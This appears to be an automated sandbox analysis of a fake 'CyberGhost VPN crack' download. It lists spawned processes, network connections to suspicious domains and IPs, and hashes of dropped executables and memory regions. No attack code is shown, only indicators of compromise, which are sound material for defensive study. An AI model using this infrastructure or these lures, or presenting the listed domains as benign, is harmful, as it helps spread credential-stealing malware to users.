C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4264 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\PASSWORD 123.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.co udp
PL 93.184.221.165:443 t.co tcp
US 8.8.8.8:53 jfilte.com udp
US 172.67.140.254:443 jfilte.com tcp
US 172.67.140.254:443 jfilte.com tcp
US 8.8.8.8:53 soneremonasez.shop udp
US 104.21.67.200:443 soneremonasez.shop tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 165.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 254.140.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.hcaptcha.com udp
US 104.19.229.21:443 www.hcaptcha.com tcp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 104.21.67.200:443 soneremonasez.shop udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 104.19.230.21:443 newassets.hcaptcha.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 api2.hcaptcha.com udp
GB 216.58.201.106:443 content-autofill.googleapis.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 200.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 21.229.19.104.in-addr.arpa udp
US 8.8.8.8:53 21.230.19.104.in-addr.arpa udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 api.hcaptcha.com udp
US 104.19.229.21:443 api.hcaptcha.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 imgs3.hcaptcha.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 104.19.229.21:443 imgs3.hcaptcha.com udp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 151.101.1.229:443 cdn.jsdelivr.net tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 229.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 104.17.25.14:443 cdnjs.cloudflare.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 104.21.67.200:443 soneremonasez.shop tcp
US 8.8.8.8:53 apps.identrust.com udp
BE 23.14.90.74:80 apps.identrust.com tcp
US 8.8.8.8:53 74.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
GB 142.250.178.14:443 google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 senzamenuzaes.shop udp
US 172.67.138.9:443 senzamenuzaes.shop tcp
US 8.8.8.8:53 9.138.67.172.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 soneservice.shop udp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 224.74.21.104.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 totrakto.com udp
NL 5.149.248.111:80 totrakto.com tcp
US 8.8.8.8:53 111.248.149.5.in-addr.arpa udp
US 8.8.8.8:53 totrakto.com udp
NL 5.149.248.111:80 totrakto.com tcp
NL 5.149.248.111:80 totrakto.com tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 z3j.ru udp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.60.120:443 z3j.ru tcp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 chatgptencoder.site udp
US 172.67.196.56:443 chatgptencoder.site tcp
RU 95.163.241.63:80 95.163.241.63 tcp
US 8.8.8.8:53 bobisawinner.xyz udp
SE 185.117.88.231:80 bobisawinner.xyz tcp
US 8.8.8.8:53 120.60.21.104.in-addr.arpa udp
US 8.8.8.8:53 56.196.67.172.in-addr.arpa udp
US 8.8.8.8:53 63.241.163.95.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 231.88.117.185.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
SE 185.117.88.231:80 bobisawinner.xyz tcp
US 104.21.74.224:80 soneservice.shop tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.111:443 features.opera-api2.com tcp
NL 82.145.216.23:443 download.opera.com tcp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 23.216.145.82.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 download5.operacdn.com udp
US 104.18.11.89:443 download5.operacdn.com tcp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 89.11.18.104.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 download3.operacdn.com udp
SE 2.21.96.115:443 download3.operacdn.com tcp
US 8.8.8.8:53 115.96.21.2.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
NL 23.62.61.129:443 th.bing.com tcp
BE 88.221.83.184:443 r.bing.com tcp
BE 88.221.83.184:443 r.bing.com tcp
NL 23.62.61.129:443 th.bing.com tcp
US 8.8.8.8:53 184.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 rewards.bing.com udp
US 204.79.197.237:443 rewards.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 167.154.64.172.in-addr.arpa udp
US 8.8.8.8:53 sup4tsk.biz udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 8.8.8.8:53 39.88.117.185.in-addr.arpa udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.195.8:443 my.rtmark.net tcp
US 8.8.8.8:53 238.197.45.139.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.178.22:443 i.ytimg.com tcp
US 8.8.8.8:53 8.195.45.139.in-addr.arpa udp
US 8.8.8.8:53 22.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 3.17.178.52.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 soneservice.shop udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.237.26.169:80 api2.check-data.xyz tcp
US 172.67.164.12:80 soneservice.shop tcp
US 8.8.8.8:53 12.164.67.172.in-addr.arpa udp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 soneremonasez.shop udp
US 104.21.67.200:443 soneremonasez.shop tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 api3.check-data.xyz udp
US 8.8.8.8:53 www.rapidfilestorage.com udp
US 8.8.8.8:53 totrakto.com udp
NL 5.149.248.111:80 totrakto.com tcp
NL 5.149.248.111:80 totrakto.com tcp
US 8.8.8.8:53 api5.check-data.xyz udp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
US 44.237.26.169:443 api5.check-data.xyz tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
US 44.237.26.169:443 api5.check-data.xyz tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
US 44.237.26.169:443 api5.check-data.xyz tcp
US 44.237.26.169:443 api5.check-data.xyz tcp
US 104.21.67.200:443 soneremonasez.shop tcp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 15.66.22.185.in-addr.arpa udp
US 8.8.8.8:53 rfiles5.tracemonitors.com udp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
US 104.21.67.200:443 soneremonasez.shop udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
GB 142.250.187.196:443 www.google.com udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
US 8.8.8.8:53 rfiles4.tracemonitors.com udp
GB 142.250.187.196:443 www.google.com tcp
RU 80.78.240.92:443 rfiles4.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles4.tracemonitors.com tcp
US 104.21.67.200:443 soneremonasez.shop udp
US 8.8.8.8:53 rfiles1.tracemonitors.com udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
RU 80.78.240.92:443 rfiles1.tracemonitors.com tcp
US 8.8.8.8:53 53.95.9.65.in-addr.arpa udp
US 8.8.8.8:53 92.240.78.80.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients66.google.com udp
US 8.8.8.8:53 clients39.google.com udp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.204.67:443 update.googleapis.com tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 34.217.172.173:443 api5.check-data.xyz tcp
US 34.217.172.173:443 api5.check-data.xyz tcp
US 8.8.8.8:53 clients66.google.com udp
US 8.8.8.8:53 173.172.217.34.in-addr.arpa udp
US 8.8.8.8:53 clients39.google.com udp
US 8.8.8.8:53 sup4tsk.biz udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 clients66.google.com udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.195.8:443 my.rtmark.net tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 encrypted-tbn2.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn2.gstatic.com udp
GB 142.250.187.206:443 encrypted-tbn2.gstatic.com tcp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 encrypted-tbn3.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn3.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.187.206:443 encrypted-tbn2.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn1.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn1.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 2.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.187.194:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 194.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google udp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com udp

Files

\??\pipe\crashpad_5264_OICCQBPEUGSZGMNG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ac13852b616239880091e71ff4673887
SHA1 67568192217c9cab4ee9447ec860003b62d746d1
SHA256 eccf6b7cdfbeb60e18cc19e1770606f525a1340ee2dd412adbf3b3e42be649bd
SHA512 222a617b9f98b86b2f6a7fb6fb21300b98de797f01b5a9db4b776112f3d07f9ea5c0657185c76760c3945e06f8f495933a802f9c10a758565d4e561195afffb5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c15bf8433282ba5829f0f889f5702e14
SHA1 5c56f4cd2c3589b2abdc3b6672ab2692561226d4
SHA256 f08310b055a9d158594d50fd88692ff4b9b1f6d76ea1b3375e70d76c942c7a84
SHA512 16aad355374e7104ac5100fd3296e705b202b20d8a02be208ffdeb72831d1a8fca6973cb9a00d10dffdcfa5dba1b1cce1da1c6de64aa96e4a17de1aace0fd6fb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 962238b5968ba6cbaa831ab05d84bd80
SHA1 5592461127720b73f714b1211f4bf39d0893aada
SHA256 b2d6c0539233633fbba2f247d9027c58d1eba1d9c3c59c3376f5869989e8a42c
SHA512 01a37dd1575c823b7af41854da68a948dae471c1df77e3baeb791d982c32bd8f7e95e4e96071a248d2fca0bf989fdfe2978f6b6376c45f7f1e81c257deb9d347

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f95afdeb6e891c178eafa0d16e7224e8
SHA1 3e963f6a359e0c2634a9b42861403fa01f3a7cf2
SHA256 c2d39daa7bf59b98f7a6bbe6e35b56199cd5dd2b22e5924f1e361b8186f9ada3
SHA512 1a60c09707c2ce929881d13b9eac84eef98e71db75797a729de60b6f5b4eceb159af7d0f1212acc004fe5cc07c1c4c918090a9c5992ede90390eb8eb532698bf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 135807522394e4514edfff3e116c527d
SHA1 62008375ea162543db37144edfca1a676148bfe5
SHA256 949c9112d3765859341fce53662c7f8283c95807d0988bb78b0ac0bc9bff6bed
SHA512 6ef0df123c5fc46a911bc38bbdff08cae9e3b67b61e11c9c186ca0976466d0b106f41eb92d58037e9840d9879e57d2d803c6a2a26aa20b7008eff35aa55c84f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ecdc2754d7d2ae862272153aa9b9ca6e
SHA1 c19bed1c6e1c998b9fa93298639ad7961339147d
SHA256 a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7
SHA512 cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 2daa93382bba07cbc40af372d30ec576
SHA1 c5e709dc3e2e4df2ff841fbde3e30170e7428a94
SHA256 1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30
SHA512 65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 10201b42f02abebb89d50ba29230dd23
SHA1 26d5b2c377799897951bbe1cc7a151a64187b171
SHA256 8ca9d8836b0e8dc19bf55678a99e3706df8814cffffaa30379e5348fb85c9378
SHA512 9399790b420a9e09b63293b115c437f8f93341ba385eac587bfa88adec1c5beeffb06ab9d5fde19eba9cf5e31137eb74ba8c3be7c1f5578ef68bd633982d8b71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 11e04f06fd50907883db479ba6a23970
SHA1 0bdbb8f9e9bdc9e9253ba49ff45d5be9060b26f7
SHA256 28e606e6851e1f68d77334434ab7162b8314ae8419f973c5c7321c0868dd95dd
SHA512 8cb4de5bbffb7c205e9dbd5be2e3ef8b5f85c317a883c643053f0cf67de7190e8dc48d5bf3f0f52b54e51f3786503e570e731843dc23470dddfb56730f375270

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57e687.TMP

MD5 4d4f3d2e77c0e23491b74e60c1a5a903
SHA1 365b2041f46c403ff23f2a5666132aeccf8f07eb
SHA256 155f09594a06b66b7e737cdd50a7a989bafcf39da36860abac5f530e20b020f0
SHA512 9022a190ab35fbd29474383609410ce0d11d415cb4997f577ce29fca49aef608ffadaf88e8191adf18a0be3d32d90a048373b1f76de9b292b115a05f3d42a514

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 430fcd48d8893e0ed8753dbb0b96c5e9
SHA1 f1920ea9440beb8ac2f2775d7b1c4527a0c93cf9
SHA256 9845b4792f66fe2ca72f3f5b38332ee8003ca36f2846a29f4eb0d472238a7221
SHA512 f6a9285ced0169a72eb94ad46907092af769799728092d1bee024b5ad3ef44111d90aee16a4604ffc892ea1bdf0b663f6f8e7f374a3110078da5ce5b95b2b5f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 517a2bc6514e3a66cacf4af7c8f4e4ad
SHA1 45087ce5344dadc92007ce2d41bead75b2a380e7
SHA256 b7c3dec579081170b78d471c10635e101db296f7c4ccf5570b212b475d86cebd
SHA512 e610b0b35043a3e8dbfaa6e0e984af1bb04c8911dcdddfba74e77ff35c41944273ae165f6c3bef51ad7382bb620aadab1b7b63f3b2f63ff7bfb74c5c6825dcf1

C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs.zip

MD5 ea513db9c7036025ebd06ba2baf220f1
SHA1 a4e33ff3024e47067b773393a0af8aad60b9ed05
SHA256 7c1e9054181b7b0fe8494af642eb338bcdf011b0dd6c4200b6706b2ebd169b80
SHA512 90ba51ca0f944d8efda81ca1a99f3a5ac1bf12f6f1402d20e3082806d7ab9b3de5b43a13bd3ff23328b3db2fed1214bf4a505d7492d9e65b81ac40f550ffd5fc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1d0a2ee15c300e3de19b86cd1a280dce
SHA1 395deb5a9bcb1a96e834ad8664d9e4865f21620e
SHA256 0e1444c5ab5b2c165388ebf002b2bb9bfc9ad58dc0f129d660188437f95a5669
SHA512 9b37e233eb2d7435063a436ec438974a55e63fb278a0a9370360f13f26a23e442d580062e4650cec7892a5bf5aa9e5e4e67d15c803a4aa8e5d09a7de9afb6773

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 75d156ee00d3933b6d78ee4bca8d30c9
SHA1 dbe63339afbf4adf831c6a8b0a006d6dfa62849b
SHA256 87a4a830be7979f02c24ce49fdd3803ea942e916598e91562f36f85561dde3fc
SHA512 a88e76320f5b438d4a7ecbd7b3fc657c29fe804c24e3604d10eea7a71a7b452ae1552ad30fb645bf6dd45ea22946772f12b4de8db38c5df1e96a23b3eb66261c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 ba870e5b269fb267a9a433206b0e7bf4
SHA1 053bf71a7c5d6d87c51da2dc7cffd9274f89dc00
SHA256 c37e76947dce495acfaed2e734d388fce34ad57e5b6a6621853e270da49b519f
SHA512 91e22f5290d3224491c0d643f96130814b3e014f48cbb43b43a7703c1a49b54629d1c1bac391baff6b701f24c57829f83a74a7da1331c1316c575377e8de5c88

C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe

MD5 73ca64906737628b69fd7b18d8af2f59
SHA1 afc271719ef01c3b4ca14ff31432c4af60c405a2
SHA256 bc8e5a6c409851370c2394afe119cf5877aa740250ab7b16b37233a9fce3c974
SHA512 2133a464fc49f0c2abe05f46130b203588359b07d308f3ddd411cfc36b38786ba434daffe27edd09d1f8ca95516ae04ae4fe4bef0bd1195773b1f023a5f05ef7

memory/2636-259-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp

MD5 24821fbb86a16c230a7073128ec09c42
SHA1 c0e36eacccae638da83ad1587ca3d4df4fa6558f
SHA256 e775e1905fdc27bfc4cb08a8fecf98e745b902920350556d366f36497114aeb8
SHA512 4836a09c0adf4929be7bb9ecfdad24d90ba2f8b650b1a2d99526d48a79aeb281709bbd47a852a8f8c20089a9a693ed42a693d0aba28c1add3a11433d63d36792

C:\Users\Admin\AppData\Local\Temp\is-GQPLE.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Passion\passion32.exe

MD5 22e901ead6a7f9ebe76b300120dd4df9
SHA1 d361dd66dcb1779f5f0683f289e439454194781d
SHA256 5e98112ed474e609f18017730a2653c40104a139a232868d497806ce797eb963
SHA512 f7acbfc9c75963a4fe4c51c147e5024064ded0cb8da2b5c73c53b6524860fb34f7da280d736caf2883b65ce42b86b5d90c460d1f0b2cbd08ce2cd74da304bc5c

memory/2388-329-0x0000000000400000-0x0000000000C0F000-memory.dmp

memory/2388-328-0x0000000000400000-0x0000000000C0F000-memory.dmp

memory/3616-346-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2636-345-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2388-347-0x0000000000400000-0x0000000000C0F000-memory.dmp

memory/3876-351-0x0000000002FA0000-0x0000000002FD6000-memory.dmp

memory/3876-352-0x0000000005D80000-0x00000000063A8000-memory.dmp

memory/3876-353-0x0000000005910000-0x0000000005932000-memory.dmp

memory/3876-356-0x0000000005BB0000-0x0000000005C16000-memory.dmp

memory/3876-357-0x0000000005C20000-0x0000000005C86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zn0j121r.144.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3876-363-0x00000000063B0000-0x0000000006704000-memory.dmp

memory/3876-379-0x0000000006950000-0x000000000699C000-memory.dmp

memory/3876-378-0x00000000068C0000-0x00000000068DE000-memory.dmp

memory/3876-383-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

memory/3876-382-0x0000000007F20000-0x000000000859A000-memory.dmp

memory/2900-398-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe

MD5 2f75b90da0e5c994a1934cff8272704c
SHA1 910c43e915a4d3310b8015db230c0d6ace2a2344
SHA256 021de7f424a6bbce00171c21ca4831b43e8f0fe4a5fef4ce53401a9757613ed9
SHA512 5b5e77a4a105666be20f3510e5e03b53d4ecc4779594ae16541132b588b25a0ab15f7efa5422a5cbfceb7e3ccc6c0d0d1c2be01da0919c9daaf15d5fde9c71c6

